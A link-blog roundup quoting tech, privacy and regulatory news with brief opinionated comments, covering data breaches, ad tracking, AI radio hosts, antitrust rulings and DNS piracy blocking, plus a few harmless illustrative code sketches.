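This is why researchers keep finding leaks like this one: enumerating and testing bucket names is trivial to automate.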

[…]

The leak’s real-time nature only amplifies the danger, as threat actors could monitor unfolding business operations as they happen, giving them access to otherwise locked-down environments.

[…]

Source: Employee monitoring app exposes 21M work screens | Cybernews

Can you imagine the time lost by employers going over all this data?

Microsoft Windows’ new built-in spying tool, Microsoft Recall, is a really great idea too. Not.

Internet Archive Sued for $700M by Record Labels over Digitizing Pre-1960 Songs. Petition to Rescue the Internet Archive

A dramatic appeal hopes to ensure the survival of the nonprofit Internet Archive. The signatories of a petition, which is now open for further signatures, are demanding that the US recording industry association RIAA and participating labels such as Universal Music Group (UMG), Capitol Records, Sony Music, and Arista drop their lawsuit against the online library. The legal dispute, pending since mid-2023 and expanded in March, centers on the “Great 78” project. This project aims to save 500,000 song recordings by digitizing 250,000 records from the period 1880 to 1960. Various institutions and collectors have donated the records, which are made for 78 revolutions per minute (“shellac”), so that the Internet Archive can put this cultural treasure online.

The music companies originally demanded $372 million for the online publication of the songs and the associated “mass theft.” They recently increased their demand to $700 million for potential copyright infringement. The basis for the lawsuit is the Music Modernization Act, which US President Donald Trump approved in 2018. This includes the CLASSICS Act, a law that retroactively introduces federal copyright protection for sound recordings made before 1972, which until then were protected in the US by differing state laws. The monopoly rights now apply US-wide for a good 100 years (for recordings made before 1946) or until 2067 (for recordings made between 1947 and 1972).

The lawsuit ultimately threatens the existence of the entire Internet Archive, including the widely known Wayback Machine, they say. This important public service is used by millions of people every day to access historical “snapshots” of the web. Journalists, educators, researchers, lawyers, and citizens use it to verify sources, investigate disinformation, and maintain public accountability. The legal attack also puts a “critical infrastructure of the internet” at risk. And this at a time when digital information is being deleted, overwritten, and destroyed: “We cannot afford to lose the tools that preserve memory and defend facts.” The Internet Archive was forced to delete 500,000 books as recently as 2024. It also continually struggles with IT attacks.

The case is called Universal Music Group et al. v. Internet Archive. The lawsuit was originally filed in the U.S. District Court for the Southern District of New York (Case No. 1:23-cv-07133), but is now pending in the U.S. District Court for the Northern District of California (Case No. 3:23-cv-6522). The Internet Archive takes the position that the Great 78 project does not harm the music industry. Quite the opposite: Anyone who wants to enjoy music uses commercial streaming services anyway; the old 78 rpm shellac recordings are study material for researchers.

Source: Suit of record labels: Petition to rescue the Internet Archive | heise online (NB this is a Google Translate page from the original German page)

Original page here: https://www.heise.de/news/Klage-von-Plattenlabels-Petition-zur-Rettung-des-Internet-Archive-10358777.html

How can copyright law be so incredibly wrong all the time?!

Australian radio station uses AI host for 6 months before anyone notices

I got an interesting tipoff the other day that Sydney radio station CADA is using an AI avatar instead of an actual radio host.

The story goes that their workdays presenter – a woman called Thy – actually doesn’t exist. She’s a character made using AI, and rolled out onto CADA’s website.

[…]

What is Thy’s last name? Who is she? Where did she come from? There is no biography, or further information about the woman who is supposedly presenting this show.

Compare that to the (recently resigned) breakfast presenter Sophie Nathan or the drive host K-Sera. Both their show pages include multi-paragraph biographies which include details about their careers and various accolades. They both have a couple of different photos taken during various press shoots.

But perhaps the strangest thing about Thy is that she appears to be a young woman in her 20s who has absolutely no social media presence. This is particularly unusual for someone who works in the media, where the size of your audience is proportionate to your bargaining power in the industry.

There are no photos or videos of Thy on CADA’s socials, either. It seems she was photographed just once and then promptly turned invisible.

[…]

I decided to listen back to previous shows, using the radio archiving tool Flashback. Thy hasn’t been on air for the last fortnight. Before then, the closest thing to a radio host could be found just before the top of the hour: a rather mechanical-sounding female voice announcing what songs are coming up. This person does not give her name, and none of the sweepers announce her or the show.

I noticed that on two different days, Thy announced ‘old school’ songs. On the 25th it was “old school Beyonce”, and then on the 26th it was “old school David Guetta”. Across two different days, the intonation was, I thought, strikingly similar.

To illustrate the point, I isolated the voice and layered the two clips onto audio tracks. There is a bit of interference from the imperfectly removed songs playing underneath the voice, but the host sounds identical in both instances.

Despite all this evidence, there is still a slim chance that Thy is a person. She might be someone who doesn’t like social media and is a bit shy around the office. Or perhaps she’s a composite of a couple of real people: someone who recorded her voice to be synthesised, and another who’s licensing her image.

[…]

Source: Meet Thy – the radio host I don’t think exists

[…] An ARN spokesperson said the company was exploring how new technology could enhance the listener experience.

“We’ve been trialling AI audio tools on CADA, using the voice of Thy, an ARN team member. This is a space being explored by broadcasters globally, and the trial has offered valuable insights.”

However, it has also “reinforced the power of real personalities in driving compelling content”, the spokesperson added.

The Australian Financial Review reported that Workdays with Thy has been broadcast on CADA since November, and was reported to have reached at least 72,000 people in last month’s ratings.

[…]

CADA isn’t the first radio station to use an AI-generated host. Two years ago, Australian digital radio company Disrupt Radio introduced its own AI newsreader, Debbie Disrupt.

Source: AI host: ARN radio station CADA called out for failing to disclose AI host

Now both of these articles go off the rails about the use of AI, saying that the radio station should have disclosed it. There is absolutely no legal obligation to disclose this, and I think it’s pretty cool that AI is progressing to the point where this can be done. So now, if you want to be a broadcaster yourself, you can enforce your station vision 24/7 – which you could never possibly do on your own.

ElevenLabs — a generative AI audio platform that transforms text into speech

And write, apparently. Someone needed to produce the “script” that the AI host used, which may also have had some AI involvement, I suppose, but ultimately this seems to be just a glorified text-to-speech engine trying to cash in on the AI bubble. Or maybe they took it to the next logical step: just feed it a playlist and it generates the necessary “filler” from that and whatever it can find online from a search of the artist and title, plus some random chit-chat from a (possibly) curated list of relevant current affairs articles.

Frankly, if people couldn’t tell for six months, then whatever they are doing is clearly good enough and the smarter radio DJs are probably already thinking about looking for other work or adding more interactive content like interviews into their shows. Talk Show type presenters probably have a little longer, but it’s probably just a matter of time for them too.

Source: https://radio.slashdot.org/comments.pl?sid=23674797&cid=65329681

A Data Breach at Yale New Haven Health Compromised 5.5 Million Patients’ Information

[…] Yale New Haven Health (YNHHS), a massive nonprofit healthcare network in Connecticut. Hackers stole the data of more than 5.5 million individuals during an attack in March 2025.

[…]

According to a public notice on the YNHHS website, the organization discovered “unusual activity” on its system on March 8, 2025, which was later identified as unauthorized third-party access that allowed bad actors to copy certain patient data. While the information stolen varies by individual, it may include the following:

  • Name
  • Date of birth
  • Address
  • Phone number
  • Email address
  • Race
  • Ethnicity
  • Social Security number
  • Patient type
  • Medical record number

YNHHS says the breach did not include access to medical records, treatment information, or financial data (such as account and payment information).

[…]

Source: A Data Breach at Yale New Haven Health Compromised 5.5 Million Patients’ Information | Lifehacker

Wait – race and ethnicity?!

Perplexity CEO says its browser will track everything users do online to sell ‘hyper personalized’ ads

CEO Aravind Srinivas said this week on the TBPN podcast that one reason Perplexity is building its own browser is to collect data on everything users do outside of its own app, so that it can sell premium ads.

“That’s kind of one of the other reasons we wanted to build a browser, is we want to get data even outside the app to better understand you,” Srinivas said. “Because some of the prompts that people do in these AIs is purely work-related. It’s not like that’s personal.”

And work-related queries won’t help the AI company build an accurate-enough dossier.

“On the other hand, what are the things you’re buying; which hotels are you going [to]; which restaurants are you going to; what are you spending time browsing, tells us so much more about you,” he explained.

Srinivas believes that Perplexity’s browser users will be fine with such tracking because the ads should be more relevant to them.

“We plan to use all the context to build a better user profile and, maybe you know, through our discover feed we could show some ads there,” he said.

The browser, named Comet, suffered setbacks but is on track to be launched in May, Srinivas said.

He’s not wrong, of course. Quietly following users around the internet helped Google become the roughly $2 trillion market cap company it is today.

[…]

Meta’s ad tracking technology, Pixels, which is embedded on websites across the internet, is how Meta gathers data, even on people that don’t have Facebook or Instagram accounts. Even Apple, which has marketed itself as a privacy protector, can’t resist tracking users’ locations to sell advertising in some of its apps by default.

On the other hand, this kind of thing has led people across the political spectrum in the U.S. and in Europe to distrust big tech.

The irony of Srinivas openly explaining his browser-tracking ad-selling ambitions this week also can’t be overstated.

Google is currently in court fighting the U.S. Department of Justice, which has alleged Google behaved in monopolistic ways to dominate search and online advertising. The DOJ wants the judge to order Google to divest Chrome.

Both OpenAI and Perplexity — not surprisingly, given Srinivas’ reasons — said they would buy the Chrome browser business if Google was forced to sell.

Source: Perplexity CEO says its browser will track everything users do online to sell ‘hyper personalized’ ads | TechCrunch

Yup, so even if Mozilla is making Firefox more invasive, it’s still better than these guys.

Study finding persistent chemical in European wines raises doubts and concerns

A report by the Pesticide Action Network Europe (PAN Europe) and other NGOs that uncovered high concentrations of a forever chemical in wines from across the EU – including organic ones – is sparking debate about the causes of contamination and restrictions on the substance.

The report found some wines had trifluoroacetic acid (TFA) levels 100 times higher than the strictest threshold for drinking water in Europe.

TFA belongs to the PFAS family (per- and polyfluoroalkyl substances), which is used in many products, including pesticides, for its water-repellent properties. Extremely persistent in the environment, these substances are a known threat to human health.

“This is a wake-up call,” said Helmut Burtscher-Schaden, an environmental chemist at Global 2000, one of the NGOs behind the research. “TFA is a permanent chemical and will not go away.” 

The NGOs analysed 49 wines. Comparing modern wines with older vintages, the findings suggested no detectable residues in pre-1988 wines but a sharp increase since 2010.  

“For no other agricultural product are the harvests from past decades so readily available and well-preserved,” the study said.

PAN sees a correlation between rising levels of TFA in wine and the growing use of PFAS-based pesticides.

Under the spotlight

Though nearly a quarter of Austria’s vineyards are cultivated organically, Austrian bottles are over-represented in the list of contaminated wines (18 out of 49), as the NGOs started testing in that country before expanding the reach of the research.

[… Winemakers complain about the study, who would have thought…]

In response, the European executive’s officials passed the buck to member states, noting that they had resisted the Commission’s proposal to stop renewing approvals for certain PFAS pesticides. An eventual agreement was reached on just two substances.

More could be done to limit PFAS chemicals at the national level under the current EU legislation, Commission representatives said.

Source: Study finding persistent chemical in European wines raises doubts and concerns – Euractiv

Spacetop AR is now an expensive Windows app instead of a useless screenless laptop

The Spacetop AR laptop made a splash when it debuted a few years ago with an intriguing pitch: What if you could have a notebook that works entirely through augmented reality glasses, without a built-in screen of its own? Unfortunately, we found the Spacetop experience to be underwhelming, and the hardware seemed like a tough sell for $1,900. Last fall, Spacetop’s creator Sightful told CNET that it was abandoning the screen-less laptop altogether and instead focusing on building AR software for Windows PCs. Now, we have a clearer sense of what Sightful is up to.

Today, Sightful is officially launching Spacetop for Intel-powered Windows AI PCs, following a short trial launch from January. For $899 you get a pair of XREAL’s Air 2 Ultra glasses and a year of Spacetop’s software. Afterwards, you’ll have to pay $200 annually for a subscription. The software works just like the original Spacetop concept — it gives you a large 100-inch AR interface for doing all of your productivity work — except now you’re not stuck with the company’s middling keyboard and other hardware.

[…]

Spacetop doesn’t support Intel chips without NPUs, as its AR interface requires constant AI processing. It doesn’t work with AMD or Qualcomm’s AI CPUs, either.

[…]

In a conversation with Engadget, Sightful CEO Tamir Berliner noted that the company might pay more attention to other chip platforms if they attract similar attention.

[…]

you’ll have to get used to wearing Xreal’s large Air 2 Ultra glasses. When we demoed them at CES, we found them to be an improvement over previous Xreal frames, thanks to their sharp 1080p micro-OLED displays and wider field of view. The Air 2 Ultra are also notable for having 6DoF tracking, which allows you to move around AR objects. While sleeker than the Vision Pro, the glasses are still pretty clunky, and you’ll also have to snap in additional prescription frames if necessary.

I’ll need to see this latest iteration of Spacetop in action before making any final judgments, but it’s clearly a more viable concept as an app that can work on a variety of laptops. Nobody wants to buy bespoke hardware like the old Spacetop laptop, no matter how good a party trick it may be.

Source: Spacetop AR is now an expensive Windows app instead of a useless screenless laptop

This looks like an excellent idea, and one I would love to get if it weren’t so tied to specific hardware and a $200-per-year subscription.

EC fines Meta, Apple €700M for DMA compliance failures

Meta and Apple have earned the dubious honor of being the first companies fined for non-compliance with the EU’s Digital Markets Act, which experts say could inflame tensions between US President Donald Trump and the European bloc.

Apple was penalised to the tune of €500 million ($570 million) for violating anti-steering rules and Meta by €200 million ($228 million) for its “consent or pay” ad model, the EU said in a press release.

The fines are a pittance for both firms, whose most recent quarterly earnings statements from January saw Apple report $36.33 billion in net income, and Meta $20.83 billion.

Apple’s penalty concerned anti-steering violations – an area in which it has already paid a €1.8 billion penalty to the EU – with the company found guilty of not allowing app developers to direct users to cheaper alternatives outside Apple’s own in-app payment system. The European Commission also ordered Apple to “remove the technical and commercial restrictions on steering” while simultaneously closing an investigation into Apple’s user choice obligations, finding that “early and proactive” moves by Cupertino to address compliance shortcomings resolved the issue.

Meta, on the other hand, was fined for the pay-or-consent model whereby it offered a paid, ad-free version of its services as the only alternative to allowing the company to harvest user data. The strategy earned it considerable ire in Europe for exactly the reason the EU began investigating it last year: That it still ingested data even if users paid and that it wasn’t clear about how personal data was being collected or used.

“The Commission found that this model is not compliant with the DMA,” the EC said, because it gave users no choice to opt into a service that used less of their data, nor did it allow users to freely consent to having their data combined.

That fine only applies to the period between March and November 2024, when the consent-or-pay model was active, however. The EU said that a new advertising model introduced in November of last year resolved many of its concerns, though European privacy advocate Max Schrems says the new model will likely still be an issue.

“Meta has moved to a system with a ‘pay,’ a ‘consent’ and a ‘less ads’ option,” Schrems explained in a statement emailed to The Register. Schrems said the “less ads” option is nothing but a distraction.

“It has massive usability limitations – nothing any user seriously wants,” Schrems said. “Meta has simply created a ‘fake choice’, pretending that it would overcome the illegal ‘pay or okay’ approach.”

Alongside the fines, the EU also said that it was removing Facebook Marketplace’s designation as a DMA gatekeeper, as it had too few commercial users to qualify as “an important gateway for business users to reach end users.”

[… followed by stuff about how Americans don’t like the fines in usual snowflakey Trump style crying tantrums]

Source: EC fines Meta, Apple €700M for DMA compliance failures • The Register

Blue Shield of California Exposed the Data of 4.7 Million People to Google for targeted advertising

Blue Shield of California shared the protected health information of 4.7 million individuals with Google over a nearly three-year period, a data breach that impacts the majority of its nearly 6 million members, according to reporting from Bleeping Computer.

This isn’t the only large data breach to affect a healthcare organization in the last year alone. Community Health Center records were hacked in October 2024, compromising more than a million individuals’ data, along with an attack on lab testing company Lab Services Cooperative, which affected records of 1.6 million Planned Parenthood patients. UnitedHealth Group suffered a breach in February 2024, resulting in the leak of more than 100 million people’s data.

What happened with Blue Shield of California?

According to an April 9 notice posted on Blue Shield of California’s website, the company allowed certain data, including protected health information, to be shared with Google Ads through Google Analytics, which may have allowed Google to serve targeted ads back to members. While not discovered until Feb. 11, 2025, the leak occurred for several years, from April 2021 to January 2024, when the connection between Google Analytics and Google Ads was severed on Blue Shield websites.
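
To make the mechanism concrete: Google Analytics tags are JavaScript snippets that run on every instrumented page and report whatever parameters they are configured to send, and when an Analytics property is linked to a Google Ads account, those signals can flow into ad targeting. A minimal, purely hypothetical TypeScript sketch of how a health insurer’s “Find a Doctor” page could leak sensitive data this way; all names and parameters here are illustrative, not Blue Shield’s actual code:

```ts
// Hypothetical sketch, not Blue Shield's actual code: a standard GA4
// "search" event fired from a "Find a Doctor" results page. If the
// Analytics property is linked to Google Ads, parameters like these
// can end up informing ad targeting.
declare function gtag(...args: unknown[]): void; // provided by the GA tag script

const params = new URLSearchParams(window.location.search);

gtag("event", "search", {
  // In context, a search term like "oncologist" is protected health info.
  search_term: params.get("specialty"),
  // Illustrative custom parameter; an insurance group number is PHI too.
  plan_group: params.get("group"),
});
```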

The following Blue Shield member information may have been compromised:

  • Insurance plan name, type, and group number
  • City and zip code
  • Gender
  • Family size
  • Blue Shield assigned identifiers for online accounts
  • Medical claim service date and provider
  • Patient name
  • Patient financial responsibility
  • “Find a Doctor” search criteria and results

According to the notice, no additional personal data—Social Security numbers, driver’s license numbers, and banking and credit card information—was disclosed. Blue Shield also states that no bad actor was involved, and it has not confirmed that the information has been used maliciously.

[…]

Source: Blue Shield of California Exposed the Data of 4.7 Million People to Google | Lifehacker

Tesla now seems to be remotely hacking odometers to weasel out of warranty repairs. Time to stop DMCA-type laws globally.

A lawsuit filed in February accuses Tesla of remotely altering odometer values on failure-prone cars, in a bid to push these lemons beyond the 50,000 mile warranty limit:

https://www.thestreet.com/automotive/tesla-accused-of-using-sneaky-tactic-to-dodge-car-repairs

The suit was filed by a California driver who bought a used Tesla with 36,772 miles on it. The car’s suspension kept failing, necessitating multiple servicings, and that was when the plaintiff noticed that the odometer readings for his identical daily drive were going up by ever-larger increments. This wasn’t exactly subtle: he was driving 20 miles per day, but the odometer was clocking 72.35 miles/day. Still, how many of us monitor our daily odometer readings?

In short order, his car’s odometer had rolled over the 50k mark and Tesla informed him that they would no longer perform warranty service on his lemon. Right after this happened, the new mileage clocked by his odometer returned to normal. This isn’t the only Tesla owner who’s noticed this behavior: Tesla subreddits are full of similar complaints:

https://www.reddit.com/r/RealTesla/comments/1ca92nk/is_tesla_inflating_odometer_to_show_more_range/

This isn’t Tesla’s first dieselgate scandal. In the summer of 2023, the company was caught lying to drivers about its cars’ range:

https://pluralistic.net/2023/07/28/edison-not-tesla/#demon-haunted-world

Drivers noticed that they were getting far fewer miles out of their batteries than Tesla had advertised. Naturally, they contacted the company for service on their faulty cars. Tesla then set up an entire fake service operation in Nevada that these calls would be diverted to, called the “diversion team.” Drivers with range complaints were put through to the “diverters” who would claim to run “remote diagnostics” on their cars and then assure them the cars were fine. They even installed a special xylophone in the diversion team office that diverters would ring every time they successfully deceived a driver.

These customers were then put in an invisible Tesla service jail. Their Tesla apps were silently altered so that they could no longer book service for their cars for any reason – instead, they’d have to leave a message and wait several days for a callback. The diversion center racked up 2,000 calls/week and diverters were under strict instructions to keep calls under five minutes. Eventually, these diverters were told that they should stop actually performing remote diagnostics on the cars of callers – instead, they’d just pretend to have run the diagnostics and claim no problems were found (so if your car had a potentially dangerous fault, they would falsely claim that it was safe to drive).

Most modern cars have some kind of internet connection, but Tesla goes much further. By design, its cars receive “over-the-air” updates, including updates that are adverse to drivers’ interests. For example, if you stop paying the monthly subscription fee that entitles you to use your battery’s whole charge, Tesla will send a wireless internet command to your car to restrict your driving to only half of your battery’s charge.

This means that your Tesla is designed to follow instructions that you don’t want it to follow, and, by design, those instructions can fundamentally alter your car’s operating characteristics. For example, if you miss a payment on your Tesla, it can lock its doors and immobilize itself, then, when the repo man arrives, it will honk its horn, flash its lights, back out of its parking spot, and unlock itself so that it can be driven away:

https://tiremeetsroad.com/2021/03/18/tesla-allegedly-remotely-unlocks-model-3-owners-car-uses-smart-summon-to-help-repo-agent/

Some of the ways that your Tesla can be wirelessly downgraded (like disabling your battery) are disclosed at the time of purchase. Others (like locking you out and summoning a repo man) are secret. But whether disclosed or secret, both kinds of downgrade depend on the genuinely bizarre idea that a computer that you own, that is in your possession, can be relied upon to follow orders from the internet even when you don’t want it to. This is weird enough when we’re talking about a set-top box that won’t let you record a TV show – but when we’re talking about a computer that you put your body into and race down the road at 80mph inside of, it’s frankly terrifying.
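
To make the design pattern being criticized here concrete, below is a deliberately simplified, entirely hypothetical TypeScript sketch (the command and handler names are invented, not Tesla’s code): a vehicle computer that applies whatever instruction the manufacturer’s server sends, with no owner-consent step anywhere.

```ts
// Hypothetical sketch of the pattern under criticism: the vehicle
// applies any authenticated server command, and the owner is never asked.
type RemoteCommand =
  | { kind: "limit_battery"; usableFraction: number } // e.g. 0.5 after a lapsed subscription
  | { kind: "prepare_repossession" };                 // lock out the owner, admit the repo agent

// Invented handler names, standing in for low-level vehicle controls.
declare function setUsableBatteryFraction(fraction: number): void;
declare function lockOutOwner(): void;
declare function enableRemoteSummon(): void;

function applyServerCommand(cmd: RemoteCommand): void {
  // Note what is missing here: any check that the person who owns
  // and occupies the car consents to the downgrade.
  switch (cmd.kind) {
    case "limit_battery":
      setUsableBatteryFraction(cmd.usableFraction);
      break;
    case "prepare_repossession":
      lockOutOwner();
      enableRemoteSummon();
      break;
  }
}
```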

[…]

Laws that ban reverse-engineering are a devastating weapon that corporations get to use in their bid to subjugate and devour the human race.

The US isn’t the only country with a law like Section 1201 of the DMCA. Over the past 25 years, the US Trade Representative has arm-twisted nearly every country in the world into passing laws that are nearly identical to America’s own disastrous DMCA. Why did countries agree to pass these laws? Well, because they had to, or the US would impose tariffs on them:

https://pluralistic.net/2025/03/03/friedmanite/#oil-crisis-two-point-oh

The Trump tariffs change everything, including this thing. There is no reason for America’s (former) trading partners to continue to enforce the laws they passed to protect Big Tech’s right to twiddle their citizens. That goes double for Tesla: rather than merely complaining about Musk’s Nazi salutes, countries targeted by the regime he serves could retaliate against him, in a devastating fashion. By abolishing their anti-circumvention laws, countries around the world would legalize jailbreaking Teslas, allowing mechanics to unlock all the subscription features and software upgrades for every Tesla driver, as well as offering their own software mods. Not only would this tank Tesla stock and force Musk to pay back the loans he collateralized with his shares (loans he used to buy Twitter and the US presidency), it would also abolish sleazy gimmicks like hacking drivers’ odometers to get out of paying for warranty service:

https://pluralistic.net/2025/03/08/turnabout/#is-fair-play

Source: Pluralistic: Tesla accused of hacking odometers to weasel out of warranty repairs (15 Apr 2025) – Pluralistic: Daily links from Cory Doctorow

Discord Wants Your Face: Begins Testing Facial Scans for Age Verification

Discord has begun requiring some users in the United Kingdom and Australia to verify their age through a facial scan before being permitted to access sensitive content. The chat app’s new process has been described as an “experiment,” and comes in response to laws passed in those countries that place guardrails on youth access to online platforms. Discord has also been the target of concerns that it does not sufficiently protect minors from sexual content.

Users may be asked to verify their age when encountering content that has been flagged by Discord’s systems as being sensitive in nature, or when they change their settings to enable access to sensitive content. The app will ask users to scan their face through a computer or smartphone webcam; alternatively, they can scan a driver’s license or other form of ID.

[…]

Source: Discord Begins Testing Facial Scans for Age Verification

Age verification is impossible to do correctly, incredibly privacy-invasive, and a really tempting target for hackers. The UK, Australia, and every other country considering age verification are seriously endangering their citizens.

Fortunately you can always hold up a picture from a magazine in front of the webcam.

Your TV is watching you better: LG TVs’ integrated ads get more personal with tech that analyzes viewer emotions

LG TVs will soon leverage an AI model built for showing advertisements that more closely align with viewers’ personal beliefs and emotions. The company plans to incorporate a partner company’s AI tech into its TV software in order to interpret psychological factors impacting a viewer, such as personal interests, personality traits, and lifestyle choices. The aim is to show LG webOS users ads that will emotionally impact them.

The upcoming advertising approach comes via a multi-year licensing deal with Zenapse, a company describing itself as a software-as-a-service marketing platform that can drive advertiser sales “with AI-powered emotional intelligence.” LG will use Zenapse’s technology to divide webOS users into hyper-specific market segments that are supposed to be more informative to advertisers. LG Ad Solutions, LG’s advertising business, announced the partnership on Tuesday.

The technology will be used to inform ads shown on LG smart TVs’ homescreens, free ad-supported TV (FAST) channels, and elsewhere throughout webOS, per StreamTV Insider. LG will also use Zenapse’s tech to “expand new software development and go-to-market products,” it said. LG didn’t specify the duration of its licensing deal with Zenapse.

[…]

With all this information, ZenVision will group LG TV viewers into highly specified market segments, such as “goal-driven achievers,” “social connectors,” or “emotionally engaged planners,” an LG spokesperson told StreamTV Insider. Zenapse’s website for ZenVision points to other potential market segments, including “digital adopters,” “wellness seekers,” “positive impact & environment,” and “money matters.”

Companies paying to advertise on LG TVs can then target viewers based on the ZenVision-specified market segments and deliver an “emotionally intelligent ad,” as Zenapse’s website puts it.

This type of targeted advertising aims to bring advertisers more in-depth information about TV viewers than demographic data or even contextual advertising (which shows ads based on what the viewer is watching) via psychographic data. Demographic data gives advertisers viewer information, like location, age, gender, ethnicity, marital status, and income. Psychographic data is supposed to go deeper and allow advertisers to target people based on so-called psychological factors, like personal beliefs, values, and attitudes. As Salesforce explains, “psychographic segmentation delves deeper into their psyche” than relying on demographic data.

[…]

With their ability to track TV viewers’ behavior, including what they watch and search for on their TVs, smart TVs are a growing obsession for advertisers. As LG’s announcement pointed out, CTVs represent “one of the fastest-growing ad segments in the US, expected to reach over $40 billion by 2027, up from $24.6 billion in 2023.”

However, as advertisers’ interest in appealing to streamers grows, so do their efforts to track and understand viewers for more targeted advertising. Both efforts could end up pushing the limits of user comfort and privacy.

[…]

Source: LG TVs’ integrated ads get more personal with tech that analyzes viewer emotions – Ars Technica

An LG TV is not exactly a cheap thing. I am paying for the whole product, not for a service. I bought a TV, not a marketing department.

Google Found Guilty of Illegal Ad Tech Monopoly in US Federal Court Ruling

A federal judge has ruled that Google maintained illegal monopolies in the digital advertising technology market.

In a landmark case brought by the Department of Justice and 17 states, the court found Google liable for antitrust violations.

Federal Court Finds Google Violated Sherman Act

U.S. District Judge Leonie Brinkema ruled that Google illegally monopolized two key markets in digital advertising:

  • The publisher ad server market
  • The ad exchange market

The 115-page ruling states Google violated Section 2 of the Sherman Antitrust Act by “willfully acquiring and maintaining monopoly power.”

It also found that Google unlawfully tied its publisher ad server (DFP) and ad exchange (AdX) together.

Judge Brinkema wrote in the ruling:

“Plaintiffs have proven that Google possesses monopoly power in the publisher ad server for open-web display advertising market. Google’s publisher ad server DFP has a durable and ‘predominant share of the market’ that is protected by high barriers both to entry and expansion.”

Google’s Dominant Market Position

The court found that Google controlled approximately 91% of the worldwide publisher ad server market for open-web display advertising from 2018 to 2022.

In the ad exchange market, Google’s AdX handled between 54% and 65% of total transactions, roughly nine times larger than its closest competitor.

The judge cited Google’s pricing power as evidence of its monopoly. Google maintained a 20% take rate for its ad exchange services for over a decade, despite competitors charging only 10%.

The ruling states:

“Google’s ability to maintain AdX’s 20% take rate under these market conditions is further direct evidence of the firm’s sustained and substantial power.”

Illegal Tying of Services Found

A key part of the ruling focused on Google’s practice of tying its publisher ad server (DFP) to its ad exchange (AdX).

The court determined that Google effectively forced publishers to use DFP if they wanted access to real-time bidding with AdWords advertisers, a crucial feature of AdX.

Judge Brinkema wrote, quoting internal Google communications:

“By tying DFP to AdX, Google took advantage of its ‘owning the platform, the exchange, and a huge network’ of advertising demand.”

This was compared to “Goldman or Citibank own[ing] the NYSE [i.e., the New York Stock Exchange].”

[…]

What’s Next?

Judge Brinkema has yet to decide on penalties for Google’s violations. Soon, the court will “set a briefing schedule and hearing date to determine the appropriate remedies.”

Possible penalties include forcing Google to sell parts of its ad tech business. This would dramatically change the digital advertising landscape.

This ruling signals that changes may be coming for marketers relying on Google’s integrated advertising system.

Google intends to appeal the decision, which could extend the legal battle for years.

[…]

Source: Google Found Guilty of Illegal Ad Tech Monopoly in Court Ruling

OpenDNS Quits Belgium Under Threat of Piracy Blocks or Fines of €100K Per Day after having quit France

In a brief statement citing a court order in Belgium but providing no other details, Cisco says that its OpenDNS service is no longer available to users in Belgium. Cisco’s withdrawal is almost certainly linked to an IPTV piracy blocking order obtained by DAZN; it requires OpenDNS, Cloudflare, and Google to block over 100 pirate sites or face fines of €100,000 per day. Just recently, Cisco withdrew from France over a similar order.

Without assurances that hosts, domain registries, registrars, DNS providers, and consumer ISPs would not be immediately held liable for internet users’ activities, investing in the growth of the early internet may have proven less attractive.

Of course, not being held immediately liable is a far cry from not being held liable at all. After years of relatively plain sailing, multiple ISPs in the United States are currently embroiled in multi-million dollar lawsuits for not policing infringing users. In Europe, countries including Italy and France have introduced legislation to ensure that if online services facilitate or assist piracy in any way, they can be compelled by law to help tackle it.

DNS Under Pressure

Given their critical role online, and the fact that not a single byte of infringing content has ever touched their services, some believed that DNS providers would be among the last services to be put under pressure.

After Sony sued Quad9, and as wider discussions opened up soon after, Canal+ used French law in 2023 to target DNS providers. Last year, Google, Cloudflare, and Cisco were ordered to prevent their services from translating domain names into IP addresses used by dozens of sports piracy sites.

While all three companies objected, it’s understood that Cloudflare and Google eventually complied with the order. Cisco’s compliance was also achieved, albeit by its unexpected decision to suspend access to its DNS service for the whole of France and the overseas territories listed in the order.
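
For context on what these orders technically demand: a recursive resolver’s only job is translating domain names into IP addresses, and a blocking order requires it to refuse that translation for the listed names. A minimal Node.js/TypeScript sketch of what such a block looks like from the client side (the domain below is a placeholder, not one of the sites in the order):

```ts
// Minimal sketch: querying a public resolver for a (placeholder) domain.
// A resolver-level block manifests as the lookup simply failing.
import { promises as dns } from "node:dns";

async function main(): Promise<void> {
  const resolver = new dns.Resolver();
  resolver.setServers(["208.67.222.222"]); // an OpenDNS public resolver

  try {
    const addrs = await resolver.resolve4("blocked-site.example"); // placeholder domain
    console.log("resolves to:", addrs);
  } catch (err) {
    // A blocking order is implemented at this step: the resolver
    // declines to translate the name (e.g. NXDOMAIN or REFUSED).
    console.log("no answer from resolver:", (err as NodeJS.ErrnoException).code);
  }
}

main();
```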

So Long France, Goodbye Belgium

Another court order obtained by DAZN at the end of March followed a similar pattern.

Handed down by a court in Belgium, it compels the same three DNS providers to cease returning IP addresses when internet users provide the domain names of around 100 pirate sports streaming sites.

At last count, those sites were linked to over 130 domain names, which Google, in its role as a search engine operator, was also ordered to deindex from search results.

During the evening of April 5, Belgian media reported that a major blocking campaign was underway to protect content licensed by DAZN and 12th Player, most likely football matches from Belgium’s Pro League. DAZN described the action as “the first of its kind” and a “real step forward” in the fight against content piracy. Google and Cloudflare’s participation was not confirmed, but it seems likely that Cisco was not involved at all.

In a very short statement posted to the Cisco community forum, employee tom1 announced that, effective April 11, 2025, OpenDNS would no longer be accessible to users in Belgium due to a court order. The nature of the order isn’t clarified, but it almost certainly refers to the order obtained by DAZN.

 


Cisco’s suspension of OpenDNS in Belgium mirrors its response to a similar court order in France. Both statements were delivered without fanfare, which may suggest that the company prefers not to be seen as taking a stand. In reality, Cisco’s reasons are currently unknown, and that has provoked some interesting comments from users on the Cisco community forum.

[…]

Source: OpenDNS Quits Belgium Under Threat of Piracy Blocks or Fines of €100K Per Day * TorrentFreak

Yup, the copyright holders are again blocking human progress on a massive scale, and corrupt politicians are creating rules that allow them to pillage whilst holding us back.

Toothpaste widely contaminated with lead and other metals, US research finds

Toothpaste can be widely contaminated with lead and other dangerous heavy metals, new research shows.

Most of the 51 brands of toothpaste tested for lead contained the dangerous heavy metal, including those for children or those marketed as green. The testing, conducted by Lead Safe Mama, also found concerning levels of highly toxic arsenic, mercury and cadmium in many brands.

About 90% of toothpastes contained lead, 65% contained arsenic, just under half contained mercury, and one-third had cadmium. Many brands contain a number of the toxins.

The highest levels detected violated the state of Washington’s limits, but not federal limits. The thresholds have been roundly criticized by public health advocates for not being protective – no level of exposure to lead is safe, the federal government has found.

“It’s unconscionable – especially in 2025,” said Tamara Rubin, Lead Safe Mama’s founder. “What’s really interesting to me is that no one thought this was a concern.”

Lead can cause cognitive damage to children, harm the kidneys and cause heart disease, among other issues. Lead, mercury, cadmium and arsenic are all carcinogens.

